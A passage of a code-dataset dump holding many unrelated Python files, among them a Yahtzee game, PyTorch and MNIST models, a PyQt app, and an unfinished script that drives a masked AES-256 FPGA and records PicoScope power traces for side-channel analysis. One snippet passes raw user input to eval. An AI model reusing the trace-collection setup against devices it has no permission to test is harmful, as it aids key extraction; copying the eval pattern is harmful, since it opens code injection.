@staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_mapping('!rrule', data, flow_style=True)\n\n\nhandlers = dict(Loader=oyaml.SafeLoader, Dumper=oyaml.SafeDumper)\noyaml.add_implicit_resolver('!sfpreset', sfp, **handlers)\noyaml.add_implicit_resolver('!midimsg', msg, **handlers)\noyaml.add_implicit_resolver('!syxmsg', syx, **handlers)\noyaml.add_implicit_resolver('!rspec', rte, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft1, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft2, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft3, **handlers)\nseqnode = oyaml.SequenceNode\nmapnode = oyaml.MappingNode\noyaml.add_path_resolver('!rrule', [(mapnode, 'router_rules'), (seqnode, None)], dict, **handlers)\noyaml.add_path_resolver('!rrule', [(mapnode, 'patches'), (mapnode, None), (mapnode, 'router_rules'), (seqnode, None)], dict, **handlers)\n","sub_path":"patcher/fpyaml.py","file_name":"fpyaml.py","file_ext":"py","file_size_in_byte":9276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501234649","text":"# @Email: jmaggio14@gmail.com\n# @Website: https://www.imagepypelines.org/\n# @License: https://github.com/jmaggio14/imagepypelines/blob/master/LICENSE\n# @github: https://github.com/jmaggio14/imagepypelines\n#\n# Copyright (c) 2018 Jeff Maggio, Nathan Dileas, Ryan Hartzell\ndef centroid(img):\n \"\"\"finds the centroid of the given image img\n\n Args:\n img (np.ndarray):\n input img to find the centroid of\n Returns:\n tuple: centroid of the input image (height,width)\n\n Example:\n >>> import imagepypelines as ip\n >>> lenna_centroid = centroid( ip.lenna() )\n \"\"\"\n centroid = img.shape[0]//2, img.shape[1]//2\n return centroid\n\n\ndef frame_size(img):\n \"\"\"return the height and width of a given img\n\n Args:\n img (np.ndarray): input img to find frame_size of\n\n Returns:\n tuple: frame_size, height and width of the input img\n\n Example:\n >>> import imagepypelines as ip\n >>> lenna_framesize = frame_size( ip.lenna() )\n \"\"\"\n frame_size = img.shape[0], img.shape[1]\n return frame_size\n\n\ndef dimensions(img, return_as_dict=False):\n \"\"\"\n function which returns the dimensions and data_type of a given image\n\n Args:\n img (np.ndarray): input image\n return_as_dict (bool): whether or not to return a dictionary.\n Default is False\n\n Returns:\n tuple: dimensions of the form (rows, cols, bands, dtype)\n\n Example:\n >>> import imagepypelines as ip\n 
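>>> # with return_as_dict=True the same values come back in a dict keyed\n        >>> # by 'rows', 'cols', 'bands' and 'dtype' (see the zip() mapping below)\n        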
>>> dims = dimensions( ip.lenna() )\n    \"\"\"\n    rows = img.shape[0]\n    cols = img.shape[1]\n    if img.ndim == 3:\n        bands = img.shape[2]\n    else:\n        bands = 1\n    dims = (rows, cols, bands, img.dtype)\n\n    if return_as_dict:\n        dims = dict(zip(('rows','cols','bands','dtype'), dims))\n\n    return dims\n\n\n# END\n","sub_path":"imagepypelines/core/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632321404","text":"import random\nscore = 999\ncost = 10\nscorew = 1000\nprint ('score: ' , score , 'points' , '\\n Cost to play = ', cost , ' points\\n' , 'Score to win: ' , scorew)\ndef YAHTZEE():\n    global score  # score is reassigned below; without this Python raises UnboundLocalError\n    keepPlaying = True\n    while keepPlaying:\n        Play = input('Please enter \"y\" if you want to play a round of the dice game or \"q\" if you want to quit game\\n If you want to restart then enter \"r\": ')\n        print(' ')\n        if Play != 'r':\n            if Play == 'y':\n                score-=cost\n                if score < 0:\n                    print('insufficient score \\n YOU LOSE!!!')\n                    break\n                elif score >= scorew:\n                    print(scorew, 'points! \\n YOU WIN!!!')\n                    continue\n                print('score: ' , score , 'points')\n                dice = [0,0,0,0,0]\n                for i in range(0,len(dice)):\n                    dice[i] = random.randint(1,6)\n                print('\\n roll 1' , dice , '\\n')\n                triesleft = 2\n                rnum = 2\n                while triesleft > 0:\n                    use = int(input('How many dice do you want to re-roll?'))\n                    user = input('Please choose the dice numbers you wish to re-roll:\\n ')\n                    if use == 1:\n                        a = int(user)\n                        dice[a-1] = random.randint(1,6)\n                    elif use == 2:\n                        a,b = user.split (\" \")\n                        for i in (int(a)-1,int(b)-1):\n                            dice[i] = random.randint(1,6)\n                    elif use == 3:\n                        a,b,c = user.split (\" \")\n                        for i in (int(a)-1,int(b)-1,int(c)-1):\n                            dice[i] = random.randint(1,6)\n                    elif use == 4:\n                        a,b,c,d = user.split (\" \")\n                        for i in (int(a)-1,int(b)-1,int(c)-1,int(d)-1):\n                            dice[i] = random.randint(1,6)\n                    elif use == 5:\n                        a,b,c,d,e = user.split (\" \")\n                        for i in (int(a)-1,int(b)-1,int(c)-1,int(d)-1,int(e)-1):\n                            dice[i] = random.randint(1,6)\n                    elif use == 0:\n                        break\n                    else:\n                        print('Sorry, input not recognized')\n                        break\n                    print ('\\n roll',rnum , dice , '\\n')\n                    triesleft = triesleft -1\n                    rnum = rnum+1\n                final = []\n                for i in dice:\n                    final.append (dice.count(i))\n                final.sort(reverse=True)  # sort after counting, so final[0] is the highest count\n                if final[0] == 5:\n                    score+=30\n                    print ('YAHTZEE! +30 points\\n' , 'score: ' , score , 'points')\n                elif final[0] == 4:\n                    score+=20\n                    print ('Four of a kind! +20 points\\n' , 'score: ' , score , 'points')\n                elif final.count(3) == 3 and final.count(2) == 2:\n                    score+=15\n                    print ('Full House! +15 points\\n' , 'score: ' , score , 'points')\n                elif final[0] == 3:\n                    score+=10\n                    print ('Three of a kind! +10 points\\n' , 'score: ' , score , 'points')\n                elif final.count(2) == 4:\n                    score+=5\n                    print ('Two Pairs. +5 points\\n' , 'score: ' , score , 'points')\n                elif sum(final) == 5:\n                    score+=20\n                    print ('Straight! +20 points\\n' , 'score: ' , score , 'points')\n                else:\n                    print(score)\n                    print('Sorry... 
you got nothing')\n else:\n keepPlaying = False\n elif Play == 'r':\n break\n else:\n break\n else:\n keepPlaying = False\n YAHTZEE()\nYAHTZEE()\n","sub_path":"Nooblet/Introduction to OOP/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184585277","text":"from .exceptions import ApiError\n\n# -----------------------------------------------------------------------------\n\n\nclass Related(object):\n def __init__(self, **kwargs):\n self._view_classes = kwargs\n\n def __call__(self, data, view):\n for field_name, view_class in self._view_classes.items():\n many = view.deserializer.fields[field_name].many\n self.resolve_nested(data, field_name, view_class, many=many)\n\n return data\n\n def resolve_nested(self, data, field_name, view_class, many=False):\n try:\n nested_data = data[field_name]\n except KeyError:\n # If this field were required, the deserializer already would have\n # raised an exception.\n return\n\n try:\n if many:\n if not nested_data:\n resolved = []\n else:\n view = view_class()\n resolved = [\n view.resolve_related_item(nested_datum)\n for nested_datum in nested_data\n ]\n else:\n resolved = view_class().resolve_related_item(nested_data)\n except ApiError as e:\n pointer = '/data/{}'.format(field_name)\n raise e.update({'source': {'pointer': pointer}})\n\n data[field_name] = resolved\n","sub_path":"flask_resty/related.py","file_name":"related.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575359852","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport dtcwt\nfrom pytorch_wavelets import DWT1DForward\n\nimport pdb\n\n\ndef logsumexp_2d(tensor):\n tensor_flatten = tensor.view(tensor.size(0), tensor.size(1), -1)\n s, _ = torch.max(tensor_flatten, dim=2, keepdim=True)\n outputs = s + (tensor_flatten - s).exp().sum(dim=2, keepdim=True).log()\n return outputs\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\nclass ChannelGate(nn.Module):\n def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max']):\n super(ChannelGate, self).__init__()\n self.gate_channels = gate_channels\n self.mlp = nn.Sequential(\n Flatten(),\n nn.Linear(gate_channels, gate_channels // reduction_ratio),\n nn.ReLU(),\n nn.Linear(gate_channels // reduction_ratio, gate_channels)\n )\n self.pool_types = pool_types\n def forward(self, x, is_target=False): # x.shape -> [64, 64, 300]\n channel_att_sum = None\n for pool_type in self.pool_types:\n if pool_type=='avg':\n avg_pool = F.avg_pool1d(x, kernel_size=x.size(2), stride=x.size(2))\n channel_att_raw = self.mlp(avg_pool)\n elif pool_type=='max':\n max_pool = F.max_pool1d(x, kernel_size=x.size(2), stride=x.size(2))\n channel_att_raw = self.mlp(max_pool)\n if channel_att_sum is None:\n channel_att_sum = channel_att_raw\n else:\n channel_att_sum = channel_att_sum + channel_att_raw\n scale = F.sigmoid(channel_att_sum).unsqueeze(2).expand_as(x) # channel_att_sum.shape -> [64, 64]\n if is_target:\n scale = torch.ones_like(scale).cuda() - scale\n return x * scale\n\nclass BasicConv(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, relu=True, bn=True, bias=False):\n super(BasicConv, self).__init__()\n self.out_channels = out_planes\n self.conv = nn.Conv1d(in_planes, out_planes, 
kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)\n self.bn = nn.BatchNorm1d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None\n self.relu = nn.ReLU() if relu else None\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\n\nclass ChannelPool(nn.Module):\n def forward(self, x):\n return torch.cat((torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1), torch.std(x,1).unsqueeze(1)), dim=1)\n # return torch.cat((torch.max(x, 1)[0].unsqueeze(1), torch.mean(x, 1).unsqueeze(1)), dim=1)\n\nclass SpatialGate(nn.Module):\n def __init__(self):\n super(SpatialGate, self).__init__()\n kernel_size = 3\n self.compress = ChannelPool()\n self.spatial = BasicConv(3, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)\n\n def sigmoid(self, x):\n return 1./(1.+torch.exp(-x))\n\n def forward(self, x, is_target=False):\n x_compress = self.compress(x)\n x_out = self.spatial(x_compress)\n scale = self.sigmoid(x_out) # broadcasting\n if is_target:\n scale = torch.ones_like(scale).cuda() - scale\n return x_compress * scale\n\n\nclass Feature(nn.Module):\n def __init__(self):\n super(Feature, self).__init__()\n self.conv_freq_1 = nn.Conv1d(1, 32, kernel_size=4, stride=1, padding=1)\n self.conv_freq_2 = nn.Conv1d(1, 64, kernel_size=5, stride=1, padding=2)\n self.conv_freq_3 = nn.Conv1d(1, 64, kernel_size=5, stride=1, padding=2)\n\n self.conv_time_1 = nn.Conv1d(1, 32, kernel_size=4, stride=1, padding=1)\n self.bn1 = nn.BatchNorm1d(32)\n\n self.conv_time_2 = nn.Conv1d(32, 64, kernel_size=4, stride=1, padding=2)\n self.bn2 = nn.BatchNorm1d(64)\n\n self.conv_time_3 = nn.Conv1d(32, 64, kernel_size=5, stride=1, padding=2)\n self.bn3 = nn.BatchNorm1d(64)\n\n self.maxpool = nn.MaxPool1d(stride=2, kernel_size=2) # max is better than average\n self.avgpool = nn.AvgPool1d(stride=2, kernel_size=2)\n self.relu = nn.ReLU()\n\n self.channel_1 = ChannelGate(32, pool_types=['avg', 'max'])\n self.SpatialGate = SpatialGate()\n\n self.transform = DWT1DForward(wave='haar', J=3).cuda()\n self.channel_1 = ChannelGate(32, pool_types=['avg','max'])\n # self.channel_2 = ChannelGate(64, pool_types=['avg', 'max'])\n\n def forward(self, x, is_target=False):\n x_0 = x\n # db: zh[0] -> 64,1,605 haar: 600\n # zh[1] -> 64,1,308 300\n # zh[2] -> 64,1,159 150\n zl, zh = self.transform(x)\n z1 = self.conv_freq_1(zh[0]) # 64, 16, 600\n z2 = self.conv_freq_2(zh[1]) # 64, 32, 300\n # z3 = self.conv_freq_3(zh[2]) # 64, 64, 150\n\n x = self.maxpool(self.relu(self.bn1(self.conv_time_1(x_0))))+z1\n x = self.maxpool(self.relu(self.bn2(self.conv_time_2(x))))+z2\n # x = self.maxpool(self.relu(self.bn3(self.conv_time_3(x)))) + z3\n\n # x = self.SpatialGate(x)\n\n return x\n\nclass Predictor(nn.Module):\n def __init__(self, prob=0.5):\n super(Predictor, self).__init__()\n self.fc1 = nn.Linear(64*300, 1000)\n self.bn1_fc = nn.BatchNorm1d(1000)\n self.fc3 = nn.Linear(1000, 3)\n self.bn_fc3 = nn.BatchNorm1d(3)\n self.relu = nn.ReLU()\n self.prob = prob\n\n def set_lambda(self, lambd):\n self.lambd = lambd\n\n def forward(self, x, reverse=False):\n x = x.view(x.size(0), 64*300)\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.relu(self.bn1_fc(self.fc1(x)))\n x = self.fc3(x)\n return x\n","sub_path":"model/CWRU.py","file_name":"CWRU.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"590031291","text":"var_x = 10\n\nsource = '''\nnew_var = 1\nfor i in range(var_x):\n print('-'*i)\n new_var += 1\n'''\n\nresult = exec(source)\nprint(result)\n\nprint(var_x)\nprint(new_var)\n\nsource = input(\"Enter your expression: \")\nprint(eval(source))","sub_path":"LVL 2/SEKCJA 3/39. Funkcja exec.py","file_name":"39. Funkcja exec.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265097493","text":"from core import utils\n\nurls_template = [\n ('test', False),\n ('https://test.zp.com', True),\n ('https://stackoverflow.com/questions/41124591/setting-up-periodic'\n '-tasks-in-celery-celerybeat-dynamically-using-add-periodic', True),\n ('https://web.skype.com/ru/?intsrc=client-_-webapp-_-production-_-go-signin', True),\n ('http:test.example.com', False),\n ('https//some.url.com', False),\n ('hTtPS://test.some.url', False),\n ('www.test.com.ua', False),\n ('https://www.google.com.ua/search?q=celerybeat-schedule+file&oq='\n 'celerybeat+file&aqs=chrome.1.69i57j0l3.4701j0j7&sourceid=chrome&ie=UTF-8', True)\n]\n\n\nurls = (\n (\n 'https://www.facebook.com/',\n dict(url='https://www.facebook.com/', status=200, failed_requests=0)\n ),\n (\n 'https://test.zp.com',\n dict(url='https://test.zp.com', status=None, failed_requests=1)\n )\n)\n\n\ndef test_check_url():\n for url_pair in urls_template:\n url, answer = url_pair\n assert utils.check_url(url) is answer\n\n\ndef test_initial_request():\n for pair in urls:\n url, answer = pair\n assert utils.initial_request(url) == answer\n","sub_path":"tests/core/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130822446","text":"import sys\n\nfrom Project.WinUI.Controller import Files\nfrom Project.WinUI.WindowUI import Ui_MainWindow\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nimport matplotlib.pyplot as plt\n\n\nclass MyWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setupUi(self)\n self.controller = Files()\n self.detail_items = [\"主要泳姿\", \"总时间\", \"游泳距离\", \"划臂次数\", \"单次划臂时间\", \"平均配速\", \"最大配速\", \"平均频率\", \"最大频率\"]\n self.summary_time.setDisplayFormat(\"HH:mm:ss\")\n self.tableView_detail.setGeometry(QtCore.QRect(360, 20, 240, 300))\n\n self.refresh_list_swim_view()\n self.refresh_frame_sum()\n\n self.listView_swims.clicked.connect(self.refresh)\n self.bt_summary.clicked.connect(self.change_to_summary)\n self.bt_detail.clicked.connect(self.change_to_detail)\n self.bt_quit.clicked.connect(QtWidgets.qApp.quit)\n\n def retranslateUi(self, MainWindow):\n Ui_MainWindow.retranslateUi(self, MainWindow)\n self.tableView_detail.close()\n\n def refresh_list_swim_view(self):\n list_model = QtCore.QStringListModel(self.controller.swim_file_list)\n self.listView_swims.setModel(list_model)\n\n def change_to_summary(self):\n self.tableView_detail.close()\n self.frame_sum.show()\n self.refresh_frame_sum()\n\n def change_to_detail(self):\n self.frame_sum.close()\n self.tableView_detail.show()\n self.refresh_table_view()\n\n def refresh(self):\n self.refresh_frame_sum()\n self.refresh_table_view()\n\n def refresh_table_view(self):\n pos = self.listView_swims.currentIndex()\n self.detail_model = QtGui.QStandardItemModel(5, 2)\n self.detail_model.setHorizontalHeaderLabels([\"类别\", \"数据\"])\n for j in 
range(9):\n self.detail_model.setItem(j, 0, QtGui.QStandardItem(self.detail_items[j]))\n self.detail_model.setItem(0, 1, QtGui.QStandardItem(self.controller.swim_list[pos.row()].name))\n self.detail_model.setItem(1, 1, QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].all_time // 1000, 2)) + \"s\"))\n self.detail_model.setItem(2, 1, QtGui.QStandardItem(str(self.controller.swim_list[pos.row()].pool)))\n self.detail_model.setItem(3, 1, QtGui.QStandardItem(str(self.controller.swim_list[pos.row()].number)))\n self.detail_model.setItem(4, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].once_time / 1000, 3)) + \" s\"))\n self.detail_model.setItem(5, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].averagepace, 2)) + \" s/100m\"))\n self.detail_model.setItem(6, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].maxpace, 2)) + \" s/100m\"))\n self.detail_model.setItem(7, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].averagerate, 2)) + \" times/10s\"))\n self.detail_model.setItem(8, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].maxrate, 2)) + \" times/10s\"))\n self.tableView_detail.setModel(self.detail_model)\n\n def refresh_frame_sum(self):\n pos = self.listView_swims.currentIndex()\n self.text_main_swim.setText(self.controller.swim_list[pos.row()].name)\n hour = self.controller.swim_list[pos.row()].all_time // 1000 // 60 // 60\n minute = self.controller.swim_list[pos.row()].all_time // 1000 // 60 % 60\n sec = self.controller.swim_list[pos.row()].all_time // 1000 % 60\n self.summary_time.setTime(QtCore.QTime(hour, minute, sec))\n self.label_calorie_num.setText(str(round(self.controller.swim_list[pos.row()].all_time / 1000 * 0.8, 2)) + \"千卡\")\n try:\n self.label_average_speed_num.setText(str(round(self.controller.swim_list[pos.row()].duration * 100 / (\n self.controller.swim_list[pos.row()].number * self.controller.swim_list[pos.row()].arm_stroke), 2)))\n except Exception:\n self.label_average_speed_num.setText(\"NAN\")\n\n x = [str(i * 10) + \"\" for i in range(len(self.controller.swim_list[pos.row()].avgepace))]\n plt.subplot(211)\n plt.plot(x, self.controller.swim_list[pos.row()].avgepace)\n plt.title(\"平均配速\", fontproperties=\"SimHei\")\n plt.subplots_adjust(hspace=0.5)\n x = [str(i * 10) + \"\" for i in range(len(self.controller.swim_list[pos.row()].avgerate))]\n plt.subplot(212)\n plt.plot(x, self.controller.swim_list[pos.row()].avgerate)\n plt.title(\"平均频率\", fontproperties=\"SimHei\")\n plt.savefig(\"mat\", dpi=1000)\n plt.clf()\n self.pixmap = QtGui.QPixmap(\"mat.png\")\n self.label_main_image.setPixmap(self.pixmap)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWin = MyWindow()\n myWin.show()\n sys.exit(app.exec_())\n","sub_path":"Project/WinUI/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167515419","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom load_data import load_data\nfrom model1 import FullyConnectedNetwork\nfrom model2 import FCNetworkMiniBatch\nfrom cnn_keras import CnnKeras\n\ndef plot():\n rates = [0.001]\n num_epoch = 201\n batch_size = 100\n steps = 3001\n for rate in rates:\n # fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n # learning_rate=rate)\n fnc = FullyConnectedNetwork(num_steps=steps, learning_rate=rate)\n with 
np.load('eval_%s.npz' % fnc.param_str()) as npz:\n plt.plot(npz['valid_accuracy'], label=rate.__str__())\n plt.legend(list(map(lambda x: x.__str__(), rates)), loc='lower right')\n plt.xlabel('epoch')\n plt.ylabel('validation accuracy')\n plt.title('learning curve')\n plt.show()\n\ndef plot_mini_batch():\n rate = 0.001\n num_epoch = 301\n batch_sizes = [100, 500, 1000, 1500, 2000]\n # steps = 30001\n for batch_size in batch_sizes:\n fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n learning_rate=rate)\n with np.load('mini/eval_%s.npz' % fnc.param_str()) as npz:\n plt.plot(npz['valid_accuracy'], label=batch_size.__str__())\n plt.legend(list(map(lambda x: x.__str__(), batch_sizes)), loc='lower right')\n plt.xlabel('epoch')\n plt.ylabel('validation accuracy')\n plt.title('learning curve')\n plt.show()\n\ndef collect_data():\n # rates = [0.005, 0.001, 0.0005]\n rates = [0.5]\n num_epoch = 501\n batch_sizes = [100, 2000]\n steps = 501\n # for rate in rates:\n # fnc = FullyConnectedNetwork(num_steps=steps, learning_rate=rate)\n # train_loss, train_accuracy, valid_loss, valid_accuracy = fnc.learn()\n # np.savez('eval_%s.npz' % fnc.param_str(),\n # train_loss=train_loss, train_accuracy=train_accuracy,\n # valid_loss=valid_loss, valid_accuracy=valid_accuracy)\n for batch_size in batch_sizes:\n rate = 0.001\n fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n learning_rate=rate)\n train_loss, train_accuracy, valid_loss, valid_accuracy = fnc.learn()\n np.savez('mini/eval_%s.npz' % fnc.param_str(),\n train_loss=train_loss, train_accuracy=train_accuracy,\n valid_loss=valid_loss, valid_accuracy=valid_accuracy)\n\ndef collect_cnn_data():\n rate = 0.001\n num_epoch=1000\n batch_size=200\n\n train, test = load_data()\n X_train = np.reshape(train[0], [-1, 28, 28, 1])\n test = np.reshape(test, [-1, 28, 28, 1])\n\n cnn = CnnKeras((X_train, train[1]), test, num_epoch=num_epoch,\n batch_size=batch_size, learning_rate=rate)\n history = cnn.learn()\n cnn.save_weights()\n np.savez('cnn/eval_cnn_%s.npz' % cnn.param_str(),\n train_loss=history.losses, train_accuracy=history.accs,\n valid_loss=history.val_losses, valid_accuracy=history.val_accs)\n predictions = cnn.predict()\n\n predictions = np.argmax(predictions, axis=1)\n indexed = np.hstack([np.arange(1, len(predictions)+1)[:, None],\n predictions[:, None]])\n np.savetxt('cnn/predictions_%s.csv' % cnn.param_str(),\n indexed, fmt='%d', header='ImageId,Label', delimiter=',',\n comments='')\n\npredict = collect_cnn_data()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433178398","text":"#\n# (c) 2017 elias/vanissoft\n#\n#\n#\n\nfrom browser import window, document\n\njq = window.jQuery\nModule_name = \"general\"\nWs_comm = None\n\nData = None\n\nclass datastore():\n\tdef __init__(self):\n\t\tself.data = {}\n\nData = datastore()\n\n\ndef message(dat):\n\tprint(\"message:\", dat)\n\tif 'error' in dat and dat['error']:\n\t\twindow.toastr.error(dat['message'], None,\n\t\t\t{\"debug\": 0, \"newestOnTop\": 1, \"positionClass\": \"toast-top-right\", \"closeButton\": 1, \"progressBar\": True})\n\telse:\n\t\twindow.toastr.info(dat['message'], None,\n\t\t\t{\"debug\": 0, \"newestOnTop\": 1, \"positionClass\": \"toast-top-right\", \"closeButton\": 1, \"progressBar\": True})\n\n\ndef incoming_data(data):\n\tprint(\"> general\", data)\n\tif 'master_unlock' in 
data:\n\t\tjq(\"#unlock_status\").removeClass(\"pe-7s-lock\")\n\t\tif not data['master_unlock']['error']:\n\t\t\tjq(\"#modal_master_password\").modal(\"hide\")\n\t\t\tdocument['MPerror'].innerHTML = \"\"\n\t\t\tjq(\"#unlock_status\").addClass(\"pe-7s-unlock\")\n\t\t\tData.data['master_unlocked'] = True\n\t\telse:\n\t\t\tdocument['MPerror'].innerHTML = data['master_unlock']['message']\n\t\t\tjq(\"#unlock_status\").addClass(\"pe-7s-lock\")\n\t\t\tData.data['master_unlocked'] = False\t# the unlock failed, so the store must not report it as unlocked\n\n\n","sub_path":"app/wmodgeneral.py","file_name":"wmodgeneral.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408547062","text":"from sys import maxsize\nN = int(input())\narms = []\nfor i in range(N):\n    x, l = map(int, input().split())\n    arms.append((x-l, x+l))\n\narms.sort(key=lambda x: x[1])\n\nend = -maxsize\n\nres = 0\n\nfor arm in arms:\n    if end <= arm[0]:\n        res += 1\n        end = arm[1]\nprint(res)\n","sub_path":"robot_arms.py","file_name":"robot_arms.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343601602","text":"# coding: utf-8\n\nimport time\nimport numpy as np\nimport subprocess\nimport PicoScope5244D as ps\nfrom subprocess import Popen, PIPE\nimport sys\nimport matplotlib.pyplot as plt\nimport ftd2xx\nimport pyvisa\nimport codecs\n\n#################################################################################\n############# Connect to FT2232H and Configure it to 245 Sync Fifo ##############\n#################################################################################\nd = ftd2xx.listDevices()\nh = ftd2xx.openEx(d[0])\nh.setBitMode(0xFF, 0x00) \t\t\t\t# reset mode\ntime.sleep(0.01)\nh.setBitMode(0xFF, 0x40)\t\t\t\t# 245 fifo mode\nh.setLatencyTimer(2)\n# h.setUSBParameters(0x10000,0x10000)\nh.setFlowControl(0x0100, 0x0, 0x0)\t\t# Avoid packet losses\nh.setTimeouts(200,200)\t\t\t\t\t# set RX/TX timeouts\nh.purge(1)\t\t\t\t\t\t\t\t# Purge RX buffer\nh.purge(2)\nprint(\"FT2232H configured\")\n\n\n#################################################################################\n############################ Configuration Picoscope ############################\n#################################################################################\n\npico = ps.PicoScope()\npico.setResolution(resolution='12bit')\npico.setChannel(channel='A',coupling_type='AC',voltage_range='200mV',probe=1) # measurement channel\n#pico.setChannel(channel='B',coupling_type='DC',voltage_range='500mV',probe=1) # Trigger\npico.disableChannel(channel='B')\n\npico.setSimpleTrigger(channel='ext',threshold_mV=40,direction='rising',delay_samples=300,timeout_ms=3000) #300\npico.setSamplingParameters(preTrigger_ns=0,postTrigger_ns=2300,timebase=1) #800\nprint(\"Picoscope configured\")\nprint(pico.getSamplingParameters())\n\n#################################################################################\n################################ Load info files ################################\n#################################################################################\n\n# To know the file's name ('Nth_measurement') to collect traces\nwith open('../../Data/AES_256/FileForName.txt') as f:\n    Nth_measurement = f.readlines()\n    Nth_measurement = [x.strip() for x in Nth_measurement] # remove \\n at the end\n    Nth_measurement = Nth_measurement[0]\n\n# To know the number of traces ('n_traces')\nwith 
open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\pt_fpga.txt') as f:\n    plaintexts = f.readlines()\n    plaintexts = [x.strip() for x in plaintexts] # remove \\n at the end\n    nb_plaintexts = len(plaintexts)\n    n_traces = nb_plaintexts\n\n# Functions to code and decode hex\nencode_hex = codecs.getencoder(\"hex_codec\")\ndecode_hex = codecs.getdecoder(\"hex_codec\")\n\n############# AES 256 INPUTS ###############\n############### Import key ##################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\keys_unique.txt') as f:\n    key_hex = f.readlines()\nkey_header_hex_msb = '00' + key_hex[0][0:32]\nkey_header_hex_lsb ='01' + key_hex[0][32:64]\nkey_string = decode_hex(key_header_hex_msb)[0] + decode_hex(key_header_hex_lsb)[0]\n# key_string is the key as raw bytes decoded from hex.\n# the first 16 key bytes are prefixed with the header byte 00\n# the last 16 key bytes are prefixed with the header byte 01\n\n############### Import mask ##################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\masks_unique.txt') as f:\n    mask_hex = f.readlines()\nmask_header_hex_msb = '02' + mask_hex[0][0:32]\nmask_header_hex_lsb ='03' + mask_hex[0][32:64]\nmask_string = decode_hex(mask_header_hex_msb)[0] + decode_hex(mask_header_hex_lsb)[0]\n\n################ Import plaintexts #################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\pt_fpga.txt') as f:\n    plaintexts = f.readlines()\nplaintexts = [x.strip() for x in plaintexts] # remove \\n at the end\nnb_plaintexts = len(plaintexts)\nn_traces = nb_plaintexts\n\npt_string = ['']*nb_plaintexts\ni=0\nfor x in plaintexts:\n    pt_string[i] = decode_hex(x)[0]\n    i = i + 1\n# pt_string holds the plaintexts as raw bytes decoded from hex.\n# the plaintext blocks are expected to start with a 03 header so the FPGA treats them as plaintexts.\n\n\n#################################################################################\n################################ Collect traces #################################\n#################################################################################\n\nprint(\"Send first mask \", mask_string, \" : \", h.write(mask_string))\nprint(\"Send first key \", key_string, \" : \", h.write(key_string))\nprint(\"Send first pltxt \", pt_string[0], \" : \", h.write(pt_string[0]))\nprint(\"First result : \", encode_hex(h.read(16))[0].decode('utf-8'))\n# repeat the first exchange once more; the reply is read and discarded\nh.write(mask_string)\nh.write(key_string)\nh.write(pt_string[0])\nencode_hex(h.read(16))[0].decode('utf-8')\n\nciphertext = ['']*n_traces\ntrace_A = ['']*n_traces\npico.run()\ni=0\nprint(\"Starting...\")\nwhile i < n_traces:\n\n    # Delay to stabilize the channels\n    if i==0:\n        print('Waiting stabilization of picoscope...')\n        time.sleep(10)\n\n    # Send and retrieve data\n    h.write(pt_string[i])\n    ciphertext[i] = 